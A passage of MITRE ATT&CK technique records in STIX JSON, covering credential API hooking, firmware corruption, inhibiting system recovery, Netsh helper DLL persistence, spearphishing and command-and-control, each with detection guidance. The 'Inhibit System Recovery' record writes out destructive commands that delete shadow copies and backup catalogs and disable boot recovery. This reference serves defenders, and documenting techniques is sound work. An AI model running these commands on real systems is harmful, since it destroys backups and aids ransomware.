entered the building or does not have VPN access).\n\nMonitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The Store passwords using reversible encryption configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of -AllowReversiblePasswordEncryption $true, Set-ADUser and Set-ADAccountControl. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "Network", "Azure AD", "Google Workspace", "IaaS", "Office 365", "SaaS"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "created": "2020-02-11T19:01:56.887Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556", "external_id": "T1556"}, {"source_name": "Clymb3r Function Hook Passwords Sept 2013", "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", "url": "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/"}, {"source_name": "Xorrior Authorization Plugins", "description": "Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.", "url": "https://xorrior.com/persistent-credential-theft/"}, {"source_name": "Dell Skeleton", "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.", "url": "https://www.secureworks.com/research/skeleton-key-malware-analysis"}, {"source_name": "dump_pwd_dcsync", "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.", "url": "https://adsecurity.org/?p=2053"}, {"source_name": "TechNet Audit Policy", "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Credential API Hooking", "description": "Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process\u2019s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}, {"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "created": "2020-02-11T19:01:15.930Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1056/004", "external_id": "T1056.004"}, {"source_name": "Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017", "description": "Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.", "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918"}, {"source_name": "Microsoft Hook Overview", "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "Adlice Software IAT Hooks Oct 2014", "description": "Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.", "url": "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/"}, {"source_name": "MWRInfoSecurity Dynamic Hooking 2015", "description": "Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.", "url": "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/"}, {"source_name": "HighTech Bridge Inline Hooking Sept 2011", "description": "Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.", "url": "https://www.exploit-db.com/docs/17802.pdf"}, {"source_name": "Volatility Detecting Hooks Sept 2012", "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", "url": "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html"}, {"source_name": "PreKageo Winhook Jul 2011", "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", "url": "https://github.com/prekageo/winhook"}, {"source_name": "Jay GetHooks Sept 2011", "description": "Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.", "url": "https://github.com/jay/gethooks"}, {"source_name": "Zairon Hooking Dec 2006", "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", "url": "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/"}, {"source_name": "EyeofRa Detecting Hooking June 2017", "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", "url": "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/"}, {"source_name": "GMER Rootkits", "description": "GMER. (n.d.). GMER. Retrieved December 12, 2017.", "url": "http://www.gmer.net/"}, {"source_name": "Microsoft Process Snapshot", "description": "Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx"}, {"source_name": "StackExchange Hooks Jul 2012", "description": "Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.", "url": "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-08-31T17:30:05.440Z", "name": "Firmware Corruption", "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "created": "2019-04-12T18:28:15.451Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1495", "external_id": "T1495"}, {"source_name": "cisa_malware_orgs_ukraine", "description": "CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a"}, {"source_name": "dhs_threat_to_net_devices", "description": "U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.", "url": "https://cyber.dhs.gov/assets/report/ar-16-20173.pdf"}, {"source_name": "MITRE Trustworthy Firmware Measurement", "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research"}, {"source_name": "Symantec Chernobyl W95.CIH", "description": "Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.", "url": "https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-12T02:30:08.379Z", "name": "Inhibit System Recovery", "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\n* REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n* diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware)\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete \u201conline\u201d backups that are connected to their network \u2013 whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Yonatan Gotlib, Deep Instinct", "Austin Clark, @c2defense", "Pallavi Sivakumaran, WithSecure", "Joey Lei", "Harjot Shah Singh"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit, REAgentC, and diskshadow. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).\n\nFor network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Network", "IaaS", "Containers"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "created": "2019-04-02T13:54:43.136Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1490", "external_id": "T1490"}, {"source_name": "Dark Reading Code Spaces Cyber Attack", "description": " Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.", "url": "https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack"}, {"source_name": "FireEye WannaCry 2017", "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"}, {"source_name": "Talos Olympic Destroyer 2018", "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"}, {"source_name": "Diskshadow", "description": "Microsoft Windows Server. (2023, February 3). Diskshadow. Retrieved November 21, 2023.", "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow"}, {"source_name": "Crytox Ransomware", "description": "Romain Dumont . (2022, September 21). Technical Analysis of Crytox Ransomware. Retrieved November 22, 2023.", "url": "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware"}, {"source_name": "Rhino Security Labs AWS S3 Ransomware", "description": "Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.", "url": "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/"}, {"source_name": "ZDNet Ransomware Backups 2020", "description": "Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.", "url": "https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/"}, {"source_name": "disable_notif_synology_ransom", "description": "TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved October 19, 2022.", "url": "https://twitter.com/TheDFIRReport/status/1498657590259109894"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Netsh Helper DLL", "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward"], "x_mitre_deprecated": false, "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "created": "2020-01-24T14:26:51.207Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/007", "external_id": "T1546.007"}, {"source_name": "Demaske Netsh Persistence", "description": "Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.", "url": "https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html"}, {"source_name": "TechNet Netsh", "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", "url": "https://technet.microsoft.com/library/bb490939.aspx"}, {"source_name": "Github Netsh Helper CS Beacon", "description": "Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.", "url": "https://github.com/outflankbv/NetshHelperBeacon"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-31T14:15:55.690Z", "name": "Spearphishing via Service", "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "created": "2020-03-02T19:24:00.951Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1566/003", "external_id": "T1566.003"}, {"source_name": "Lookout Dark Caracal Jan 2018", "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-03-07T14:29:02.408Z", "name": "Internal Proxy", "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "created": "2020-03-14T23:08:20.244Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1090/001", "external_id": "T1090.001"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Trend Micro APT Attack Tools", "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "System Script Proxy Execution", "description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian", "Wes Hurd"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Digital Certificate Validation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1216", "external_id": "T1216"}, {"source_name": "GitHub Ultimate AppLocker Bypass List", "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"}, {"source_name": "LOLBAS Project", "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Custom Command and Control Protocol", "description": "Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ryan Becwar"], "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", "created": "2017-05-31T21:31:10.314Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1094", "external_id": "T1094"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Dead Drop Resolver", "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong 